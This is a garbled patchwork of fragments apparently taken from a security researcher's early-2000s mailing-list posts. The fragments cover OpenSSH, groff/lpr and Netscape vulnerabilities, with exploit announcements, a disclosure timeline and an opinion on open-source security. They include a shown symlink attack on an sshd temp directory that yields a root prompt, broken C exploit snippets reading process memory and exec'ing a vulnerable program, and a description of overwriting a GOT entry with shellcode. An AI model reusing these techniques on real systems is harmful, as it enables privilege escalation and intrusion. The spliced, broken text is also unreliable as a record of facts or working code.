zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory
--zen-parse
Sorry, I forgot some relevant information.
With regards to previous post:
Tested on:-
Red Hat Linux release 7.0 (Guinness)
[zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
openssh-server-2.5.2p2-1.7.2
[zen-parse@clarity zen-parse]$ ssh -V
OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL
then we have a buffer
overflow.
With the ftp service I was only able to get a 1022 byte buffer written
but with other services
with longer names that use authentication, this could be a serious
problem.
The server is still running as root while this happens.
--zen-parse
by user invoking man)
==
--zen-parse
Mon Jun 4 23:17:50 NZST 2001
** Most of the exploit tweaking involves details covered here, or the set
up of programs for the exploits to work with.
, I hope.
Could possibly be useful with the (still unpatched)
makewhatis.cron bug.
-- zen-parse
/***
#define SAFER [1000]
/***/
int shake(int script kiddy
/%d/mem,p);
close(0);
f=fopen(y,r);
fseek(f,WHERETOREAD,SEEK_SET);
execl(/tmp/vuln-prog,scary,/tmp/myscript,0);
}
EOF
-- zen-parse
//tstot.c
/
zen-parse presents
tstot.c - remote portbinding exploit for
RedHat 7.0
Netscape 4.77
fopen() call to popen() and executes code from
~/.nofinger
Read the comments.
-- zen-parse
M4D PR0PZ T0 :
Steven for showing me da bugz
noid 4 b3in6 7h3r3 wh3n no1 3153 w4z
grue 4 lurking, g00bER 4 something
and the rest of #roothat
\n);
tmp=eos(retstr);
sprintf(tmp,of groff.\n);
tmp=eos(retstr);
return retstr;
}
end pic-lpr-remote.c
-- - - - - - -- http://mp3.com/cosv - It's not just a music site! --
-- zen-parse -- (photon bed
for?) an advisory from Netscape at some point soon for this
and the other patched issues.
-- zen-parse
--
-
1) If this message was posted to a public forum by [EMAIL PROTECTED], it
may be redistributed without modification.
2
pointer for PR_Free in the global offset table of libsnpr4.so.
Shellcode can be supplied in a previously loaded image. (A large area
can be filled using compressed image files stored in a .jar as the source.)
==
-- zen-parse
to Javascript.
July 13
===
Microsoft closes off on JS bug. Patch becomes available eventually, as
threat was not seen as high by Microsoft.
+++
Netscape informed of second PNG bug/exploit method.
== Sent ==
Date: Sat, 13 Jul 2002 04:04:56 +1200 (NZST)
From: zen-parse [EMAIL PROTECTED]
is insecure, so how about
Open Source software is as secure as Closed Source.
Many eyes would make code more secure, but only if they are actually
looking at the code.
But that does not happen.
-- zen-parse
--
-
1